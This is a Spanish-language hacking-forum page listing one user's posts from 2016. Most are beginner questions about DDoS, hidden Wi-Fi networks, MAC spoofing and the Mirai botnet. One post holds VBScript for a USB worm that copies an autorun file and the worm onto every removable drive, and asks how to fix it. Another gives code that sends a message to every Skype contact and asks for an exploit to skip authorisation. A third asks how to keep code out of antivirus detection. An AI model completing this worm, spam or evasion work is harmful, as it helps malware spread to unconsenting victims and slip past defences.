elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


  Mostrar Temas
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 13 [14] 15 16 17 18 19
131  Comunicaciones / Redes / Que es un ataque ddos en router? en: 23 Diciembre 2016, 13:37 pm
Hola si alguien me hiciera un ddos yo no podria conectarme a internet  :(
132  Comunicaciones / Redes / Podria alguien ser invisible en mi red en: 23 Diciembre 2016, 13:05 pm
Hola he estado leyendo esta noticia:
 http://macnify.blogspot.com/2005/10/make-your-mac-invisible.html?m=1

Dice algo de que con un mac los hackers pueden ser invisibles en la red
Una persona podria ser invisible en mi red es decir ocultar mac ya sea utilizando una mac, una maquina virtual o una ip estatica o algo de eso.

Y tengo una duda si el router da rango ip y uno elige una ip fuera de ese rango su mac se vera? Eran mis dudas
133  Comunicaciones / Redes / si el ssid oculto y saben mi wps corro riesgo? en: 22 Diciembre 2016, 18:12 pm
Hola tengo una duda si mi ssid esta oculto pero mi wps lo saben podrían conectarse a mi wifi o le sería imposible lo digo porque me gustaría usarlo y al mismo tiempo tener mi ssid oculto. gracias.
134  Seguridad Informática / Análisis y Diseño de Malware / mirai botnet pregunta en: 22 Diciembre 2016, 13:06 pm
Hola tengo una duda sobre esta botnet que es lo que hace exactamente se esparce en dispositivos que son vulnerables o en dispositivos que utilizan creedenciales por defecto ¿? como puede ser login por defecto. No estoy seguro pero yo pensaba que si uno tenía acceso al router no podía estar en riesgo pero supongo será solo con algunos dispositivos no todos.
135  Seguridad Informática / Análisis y Diseño de Malware / mejorar este gusano* en: 21 Diciembre 2016, 13:06 pm
Hola estoy siguiendo el manual de octalh para crear un gusano, referencia:
Citar

El autorun lo hace pero se queda todo el rato haciendolo. También estoy intentando aprender a hacer uno con shorcut's pero no se como funcionan. Mi pregunta es porque no finaliza de crear de el autorun. Posdata: creo porque el loop hace que nunca finalice (cuando digo no funcione cuando conecto el usb no arranca el gusano supongo que sera porque debo ejecutar algo no sé exactamente el que)

Es decir se me queda todo el rato con el usb parpadeando y pienso que será por el loop. Habría una forma de evitar que cuando se haya copiado haga break y se salga del loop?

Y lo segundo es cuando se copia el autorun, quito el gusano y tal, y pongo otra vez de nuevo el usb el gusano no se arranca en mi ordenador¿Puede que el autorun este dañado pienso? Tenga que modificarlo de alguna manera.

Código:
do ' inicia loop infinito
Set oFS = Wscript.CreateObject("Scripting.FileSystemObject")
Set oDrives = oFS.Drives 'declaramos todos los srivers
For Each Drive in oDrives 'por cada driver
    If Drive.DriveType = DriveTypeRemovable Then 'si son del tipo removible entonces
        If Drive.DriveLetter <> "A" Then ' si la letra es de A-Z entonces
            If fso.FileExists(Drive.DriveLetter + autorunusb) Then ' si existe autorun
               set cFile = fso.GetFile (Drive.DriveLetter + autorunusb)'tomalo y
               cFile.attributes = 0 ' quitale los atributos
               fso.CopyFile autorun, Drive.DriveLetter & autorunusb , true'despues copialo
           else' de lo contrario
      fso.CopyFile autorun, Drive.DriveLetter & autorunusb , true' copialo
   End if
fso.CopyFile w0rmpatch, Drive.DriveLetter & w0rmusb , true' copia el gusano a la unidad
End If
End If
Next
loop
end sub
136  Seguridad Informática / Análisis y Diseño de Malware / troyanos que funcionan como gusano? en: 21 Diciembre 2016, 01:14 am
Siempre se ha diferenciado perfectamente gusanos,viruses,troyanos y botnets. Pero hoy en día nos encontramos con híbridos entonces que está pasando con el malware esta mutando como las películas de ciencia ficción o es mejor seguir desarrollando lo de siempre gusanos,viruses,troyanos y botnets. Es decir, seguirán funcionando por separado o podría perfectamente darse el caso de que un gusano incluyera una pequeña backdoor por ejemplo para que funcionará al mismo tiempo como troyano como se da el caso de h-worm houdini que yo lo veo más como un troyano pero parece ser un gusano nosé. Pensaba que cada cosa era diferente y no iba mezclada una con la otra. Luego también preguntar por el tiempo de vida de los gusanos ya que los gusanos pueden cambiar su estructura y hacer copias diferentes de sí misma pero manteniendo su funcionalidad. Entonces con el tema de las proactivas los gusanos no tendrían mucho tiempo de vida o al final detectarían mediante proactivas osea que ya no son útiles como malware.
137  Seguridad Informática / Bugs y Exploits / Intentando mandar mensajes masivos skype en: 20 Diciembre 2016, 14:21 pm
Hola estoy intentando mandar mensajes masivos pero nunca llegan a todos los contactos.
Código:
Public Class Form1
    Public WithEvents refSkype As New SKYPE4COMLib.Skype
    Public Mag As String = "hola"
    Private Sub Button1_Click(sender As Object, e As EventArgs) Handles Button1.Click
        Dim skype As Object
        skype = CreateObject("skype4COM.skype", "")
        skype.Client.Start()
        skype.Attach()
        For Each User In skype.Friends
            On Error Resume Next
            skype.SendMessage(User.Handle, Mag)
        Next
    End Sub
End Class


Namespace SKYPE4COMLib
    Public Class Skype
        Function ActiveCalls() As Object
            Throw New NotImplementedException
        End Function

        Function HardwiredGroups() As Object
            Throw New NotImplementedException
        End Function

        Sub PlaceCall(ByVal p1 As Object)
            Throw New NotImplementedException
        End Sub

        Sub SendMessage(ByVal p1 As Object, ByVal p2 As String)
            Throw New NotImplementedException
        End Sub

        Function User(ByVal p1 As Object) As Object
            Throw New NotImplementedException
        End Function

    End Class
End Namespace
Si es posible, se podría buscar un exploit en skype y mandaría los mensajes automaticamente sin pedir autorización como aplicacion de terceros. Simplemente con fines educativos por supuesto!
138  Seguridad Informática / Análisis y Diseño de Malware / proactivas en: 19 Diciembre 2016, 19:19 pm
Hola hay alguna manera de proteger mis aplicaciones de las proactivas cuando me refiero a proteger me refiero a proteger mi código para evitar que la incluyan en su base de datos ya que en principio no son aplicaciones dañinas simplemente aplicaciones que utilizan procedimientos para como puede ser createremotethread etc...
139  Seguridad Informática / Análisis y Diseño de Malware / una duda sobre iexpress en: 19 Diciembre 2016, 19:10 pm
Hola tengo una duda sobre iexpress ya que iexpress permite juntar dos archivos. Pero tengo una duda si iexpress genera un ejecutable que obviamente facilmente uno puede descomprimir con winrar. Pero si uno de esos ficheros hace funciones de copiado por ejemplo mi fichero se copia en otro directorio. Mi fichero se podrá copiar si esta comprimido con iexpress?
140  Foros Generales / Sugerencias y dudas sobre el Foro / Poner sanciones a los usuarios que incumplen las normas en: 13 Diciembre 2016, 20:52 pm
Hola no sé si sería bueno implementar un método de sanciones a los usuarios que incumplan las condiciones incluyendome. Cuando digo sanciones me refiero a usuarios que incumplen las normas. También me gustaría pero probablemente no es posible aplicar el refrán Si quieres recibir ayuda, también tienes que darla. ... (Proverbio chino).
Y eso de que el grupo hace la fuerza es una realidad windows podrá apropiarse de sectores estratégicos en el mercado pero nunca será tan impresionante como linux en el cual hay mogollon de distribuciones con sus repositorios propios y todo hecho sin ánimo de lucro. Entonces hay dejo mi sugerencia que probablemente no seá ni ideal ni apropiada.
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 13 [14] 15 16 17 18 19
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines